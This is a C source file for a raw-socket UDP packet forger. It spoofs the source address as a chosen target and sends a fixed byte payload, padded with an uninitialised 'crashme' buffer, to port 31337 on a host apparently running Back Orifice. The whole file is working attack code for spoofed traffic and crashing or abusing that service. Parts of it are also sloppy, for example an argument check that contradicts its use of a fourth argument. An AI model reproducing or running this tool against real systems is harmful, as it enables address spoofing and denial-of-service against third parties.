#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <linux/udp.h>
#include <netdb.h>

#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }

char data[] = {
	0xCE,	0x63,	0xD1,	0xD2,	0x16,
	0xE7,	0x13,	0xCF,	0x3D,	0xA5,
	0xA5,	0x86,	0xB2,	0x75,	0x4B,
	0x99,	0x9F,	0x18,	0x58,	0x86,
	0x89,	0x99
	};


unsigned short
in_cksum (u_short *addr, int len)
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  while (nleft > 1)
    {
      sum += *w++;
      nleft -= 2;
    }
  if (nleft == 1)
    {
      *(u_char *) (&answer) = *(u_char *) w;
      sum += answer;
    }

  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return (answer);
}

int sendpkt_udp (sin, sock, data, len, src, dst, sport, dport)
     struct sockaddr_in *sin;
     unsigned short int sock, len, sport, dport;
     unsigned long int src, dst;
     char *data;
{
  struct iphdr ip;
  struct udphdr udp;
  static char packet[8192];
  char crashme[500];
  int i, count=0;

  ip.ihl = 5;
  ip.version = 4;
  ip.tos = rand () % 100;;
  ip.tot_len = htons (28 + len);
  ip.id = htons (31337 + (rand () % 100));
  ip.frag_off = 0;
  ip.ttl = 255;
  ip.protocol = IPPROTO_UDP;
  ip.check = 0;
  ip.saddr = src;
  ip.daddr = dst;
  ip.check = in_cksum ((char *) &ip, sizeof (ip));
  udp.source = htons (sport);
  udp.dest = htons (dport);
  udp.len = htons (8 + len);
  udp.check = (short) 0;
  memcpy (packet, (char *) &ip, sizeof (ip));
  memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
  memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, len);
  memcpy (packet + sizeof (ip) + sizeof (udp) + len, crashme, 500);

  return sendto (sock, packet, sizeof (ip) + sizeof (udp) + len + 500, 0, (struct sockaddr *) sin, sizeof (struct sockaddr_in));
}

unsigned int
lookup (char *host)
{
  unsigned int addr;
  struct hostent *he;

  addr = inet_addr (host);
  if (addr == -1)
    {
      he = gethostbyname (host);
      if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
        return 0;

      bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
    }
  return (addr);
}

void main (int argc, char **argv)
{
  unsigned int src, dst;
  struct sockaddr_in sin;
  long wait=25000;
  int sock, i, dstP, srcP=113;

  if (argc != 3)
    errs ("Usage: %s <bo computer> <target> [dest port]\n", argv[0]);

  if(argv[3]) { srcP = atoi(argv[3]); }

  if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err("Unable to open raw socket. (root?)\n");
  if (!(src = lookup (argv[2])))
    err ("Unable to lookup address.\n");
  if (!(dst = lookup (argv[1])))
    err ("Unable to lookup address.\n");
  sin.sin_family = AF_INET;
  sin.sin_port = 31337;
  sin.sin_addr.s_addr = dst;
  if ((sendpkt_udp (&sin, sock, &data, sizeof(data), src, dst, srcP,
    31337)) == -1)
      err ("Error sending the UDP packet.\n");
}

